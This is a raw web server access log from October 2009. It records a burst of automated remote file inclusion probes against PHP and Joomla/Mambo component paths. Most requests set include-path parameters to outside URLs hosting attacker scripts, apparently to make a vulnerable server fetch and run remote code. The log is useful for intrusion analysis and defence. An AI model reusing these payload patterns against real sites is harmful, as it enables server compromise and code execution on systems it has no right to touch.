69.62.196.11 - - [06/Oct/2009:02:33:16 -0400] "GET /logs/access_log.Q109063000%20%20/index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.149.157.136 - - [06/Oct/2009:02:33:22 -0400] "GET //phplive/setup/header.php?css_path=http://www.medisite.fr/id???? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.136 - - [06/Oct/2009:02:33:22 -0400] "GET /logs//phplive/setup/header.php?css_path=http://www.medisite.fr/id???? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.139.66.104 - - [06/Oct/2009:02:33:45 -0400] "GET ////////////////////?_SERVER[DOCUMENT_ROOT]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 470 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.139.66.104 - - [06/Oct/2009:02:33:45 -0400] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 20737 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
218.55.227.178 - - [06/Oct/2009:02:34:08 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:02:34:08 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:02:34:08 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:02:34:08 -0400] "GET /logs/access_log.Q109081700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
174.143.3.188 - - [06/Oct/2009:02:34:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [06/Oct/2009:02:34:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
174.143.3.188 - - [06/Oct/2009:02:34:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.143.3.188 - - [06/Oct/2009:02:34:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.195.112.120 - - [06/Oct/2009:02:35:43 -0400] "GET /logs/error_log.Q109072500 HTTP/1.0" 200 2346594 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.138.48.14 - - [06/Oct/2009:02:35:45 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:45 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:45 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:45 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:56 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:56 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:56 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:35:56 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:36:19 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:36:21 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:23 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:23 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:23 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:24 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:24 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:26 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:26 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:26 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:28 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:28 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:28 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:29 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:36:31 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:32 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:32 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:32 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:36 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:36 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:36 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:40 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:42 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:42 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:36:44 -0400] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:36:44 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:36:44 -0400] "GET /logs/access_log.Q109052500/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:36:44 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:44 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:45 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:48 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:48 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:48 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:36:49 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:37:00 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:02:35:46 -0400] "GET /logs/error_log.Q109072500 HTTP/1.0" 200 2346594 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Oct/2009:02:37:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.138.48.14 - - [06/Oct/2009:02:37:33 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:37:33 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:37:33 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:37:34 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:38:55 -0400] "GET /logs/access_log.Q109053100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:33 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:33 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:33 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:33 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:38 -0400] "GET /logs/access_log.Q109091100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:38 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:39 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:39 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:39 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:39:39 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.127.253.168 - - [06/Oct/2009:02:39:47 -0400] "GET //?_zb_path=http://jdzin2.vfose.ru/oil2.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.808"
61.135.134.109 - - [06/Oct/2009:02:40:08 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:08 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:08 -0400] "GET /logs/access_log.Q109091100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:08 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:16 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:16 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:16 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:40:16 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:41:44 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:41:44 -0400] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:02:41:44 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
